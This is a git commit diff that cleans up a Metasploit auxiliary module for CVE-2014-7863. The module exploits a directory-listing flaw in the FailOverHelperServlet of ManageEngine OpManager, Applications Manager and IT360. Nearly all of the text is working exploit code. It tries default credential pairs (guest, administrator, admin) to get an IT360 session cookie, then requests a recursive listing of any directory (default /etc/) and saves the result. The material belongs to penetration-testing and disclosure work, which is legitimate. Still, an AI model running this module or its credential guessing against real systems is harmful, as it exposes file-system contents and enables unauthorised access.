Merge pull request #14 from jvazquez-r7/review_4659

Clean OpManager directory content disclosure module
bug/bundler_fix
Pedro Ribeiro 2015-01-31 19:48:20 +00:00
commit 50c518d763
1 changed files with 78 additions and 83 deletions

View File

@ -12,21 +12,20 @@ class Metasploit3 < Msf::Auxiliary
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine OpManager / Applications Manager / IT360 Arbitrary Directory Listing",
'Name' => "ManageEngine Multiple Products Arbitrary Directory Listing",
'Description' => %q{
This module exploits a directory listing information disclosure vulnerability in
FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360.
It recurses through diretories, so it will list the whole drive if you ask it to list
/ in Linux or C:\ in Windows.
This vulnerability is unauthenticated on OpManager and Applications Manager, but
authenticated in IT360. This module will attempt to login using the default
credentials for the administrator and guest accounts; alternatively you can provide a
pre-authenticated cookie or a username / password combo.
For IT360 targets enter the RPORT of the OpManager instance (usually 8300).
This module has been tested on both Windows and Linux with several different versions
Windows paths have to be escaped with 4 backslashes on the command line.
There is a companion module that allows you to download an arbitrary file.
This vulnerability has been fixed in Applications Manager v11.9 b11912 and OpManager 11.6.
This module exploits a directory listing information disclosure vulnerability in the
FailOverHelperServlet on ManageEngine OpManager, Applications Manager and IT360. It
makes a recursive listing, so it will list the whole drive if you ask it to list / in
Linux or C:\ in Windows. This vulnerability is unauthenticated on OpManager and
Applications Manager, but authenticated in IT360. This module will attempt to login
using the default credentials for the administrator and guest accounts; alternatively
you can provide a pre-authenticated cookie or a username / password combo. For IT360
targets enter the RPORT of the OpManager instance (usually 8300). This module has been
tested on both Windows and Linux with several different versions Windows paths have to
be escaped with 4 backslashes on the command line. There is a companion module that
allows you to download an arbitrary file. This vulnerability has been fixed in Applications
Manager v11.9 b11912 and OpManager 11.6.
},
'Author' =>
[
@ -35,61 +34,61 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-7863' ],
[ 'OSVDB', 'TODO' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt' ],
[ 'URL', 'FULLDISC_URL' ]
['CVE', '2014-7863'],
['OSVDB', 'TODO'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
['URL', 'FULLDISC_URL']
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'DisclosureDate' => 'Jan 28 2015'))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI',
[ true, "The base path to OpManager, AppManager or IT360", '/' ]),
OptString.new('DIRECTORY', [false, 'Path of the directory to list', '/etc/']),
OptString.new('IAMAGENTTICKET',
[false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME',
[true, 'The username to login as (IT360 target only)', 'guest']),
OptString.new('PASSWORD',
[true, 'Password for the specified username (IT360 target only)', 'guest']),
OptString.new('DOMAIN_NAME',
[false, 'Name of the domain to logon to (IT360 target only)'])
OptString.new('TARGETURI', [true, "The base path to OpManager, AppManager or IT360", '/']),
OptString.new('DIRECTORY', [true, 'Path of the directory to list', '/etc/']),
OptString.new('IAMAGENTTICKET', [false, 'Pre-authenticated IAMAGENTTICKET cookie (IT360 target only)']),
OptString.new('USERNAME', [false, 'The username to login as (IT360 target only)']),
OptString.new('PASSWORD', [false, 'Password for the specified username (IT360 target only)']),
OptString.new('DOMAIN_NAME', [false, 'Name of the domain to logon to (IT360 target only)'])
], self.class)
end
def get_cookie
cookie = nil
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(datastore['TARGETURI'])
})
if res
return res.get_cookies
end
cookie = res.get_cookies
end
cookie
end
def detect_it360
res = send_request_cgi({
'uri' => "/",
'uri' => '/',
'method' => 'GET'
})
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})/
return true
end
return false
end
def get_it360_cookie_name
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/"),
'uri' => normalize_uri('/')
})
cookie = res.get_cookies
if cookie =~ /IAMAGENTTICKET([A-Z]{0,4})/
return $1
else
@ -97,28 +96,24 @@ class Metasploit3 < Msf::Auxiliary
end
end
def authenticate_it360(port, path, username, password)
if datastore['DOMAIN_NAME'] == nil
if datastore['DOMAIN_NAME'].nil?
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => "false"
'isADEnabled' => 'false'
}
else
vars_post = {
'LOGIN_ID' => username,
'PASSWORD' => password,
'isADEnabled' => "true",
'isADEnabled' => 'true',
'domainName' => datastore['DOMAIN_NAME']
}
end
op_port = datastore['RPORT']
datastore['RPORT'] = port
res = send_request_cgi({
'rport' => port,
'method' => 'POST',
'uri' => normalize_uri(path),
'vars_get' => {
@ -129,29 +124,27 @@ class Metasploit3 < Msf::Auxiliary
'vars_post' => vars_post
})
datastore['RPORT'] = op_port
if res && res.get_cookies.to_s =~ /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/
# /IAMAGENTTICKET([A-Z]{0,4})=([\w]{9,})/ -> this pattern is to avoid matching "removed"
return res.get_cookies
else
return nil
end
nil
end
def login_it360
# Do we already have a valid cookie? If yes, just return that.
if datastore['IAMAGENTTICKET'] != nil
unless datastore['IAMAGENTTICKET'].nil?
cookie_name = get_it360_cookie_name
cookie = "IAMAGENTTICKET" + cookie_name + "=" + datastore['IAMAGENTTICKET'] + ";"
cookie = 'IAMAGENTTICKET' + cookie_name + '=' + datastore['IAMAGENTTICKET'] + ';'
return cookie
end
# get the correct path, host and port
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("/"),
'uri' => normalize_uri('/')
})
if res && res.redirect?
@ -160,44 +153,46 @@ class Metasploit3 < Msf::Auxiliary
return nil
end
if datastore['USERNAME'] && datastore['PASSWORD']
print_status("#{peer} - Trying to authenticate as #{datastore['USERNAME']}/#{datastore['PASSWORD']}...")
cookie = authenticate_it360(uri[0], uri[1], datastore['USERNAME'], datastore['PASSWORD'])
if cookie != nil
return cookie
elsif datastore['USERNAME'] == 'guest' && datastore['JSESSIONID'] == nil
# we've tried with the default guest password, now let's try with the default admin password
cookie = authenticate_it360(uri[0], uri[1], 'administrator', 'administrator')
if cookie != nil
return cookie
else
# Try one more time with the default admin login for some versions
cookie = authenticate_it360(uri[0], uri[1], 'admin', 'admin')
if cookie != nil
unless cookie.nil?
return cookie
end
end
end
return nil
end
default_users = ['guest', 'administrator', 'admin']
default_users.each do |user|
print_status("#{peer} - Trying to authenticate as #{user}...")
cookie = authenticate_it360(uri[0], uri[1], user, user)
unless cookie.nil?
return cookie
end
end
nil
end
def run
# No point to continue if directory is not specified
if datastore['DIRECTORY'].nil? || datastore['DIRECTORY'].empty?
print_error("Please supply the path of the directory you want to list.")
if datastore['DIRECTORY'].empty?
print_error('Please supply the path of the directory you want to list.')
return
end
if detect_it360
print_status("#{peer} - Detected IT360, attempting to login...")
cookie = login_it360
if cookie == nil
print_error("#{peer} - Failed to login to IT360!")
return
end
else
cookie = get_cookie
end
if cookie.nil?
print_error("#{peer} - Failed to get application cookies!")
return
end
servlet = 'com.adventnet.me.opmanager.servlet.FailOverHelperServlet'
res = send_request_cgi({
'method' => 'GET',
@ -218,7 +213,7 @@ class Metasploit3 < Msf::Auxiliary
'vars_get' => {
'operation' => 'listdirectory',
'rootDirectory' => datastore['DIRECTORY']
},
}
})
rescue Rex::ConnectionRefused
print_error("#{peer} - Could not connect.")
@ -226,7 +221,7 @@ class Metasploit3 < Msf::Auxiliary
end
# Show data if needed
if res && res.code == 200
if res && res.code == 200 && res.body
vprint_line(res.body.to_s)
fname = File.basename(datastore['DIRECTORY'])
@ -234,7 +229,7 @@ class Metasploit3 < Msf::Auxiliary
'manageengine.http',
'text/plain',
datastore['RHOST'],
res.body,
res.body.to_s,
fname
)
print_good("File with directory listing saved in: #{path}")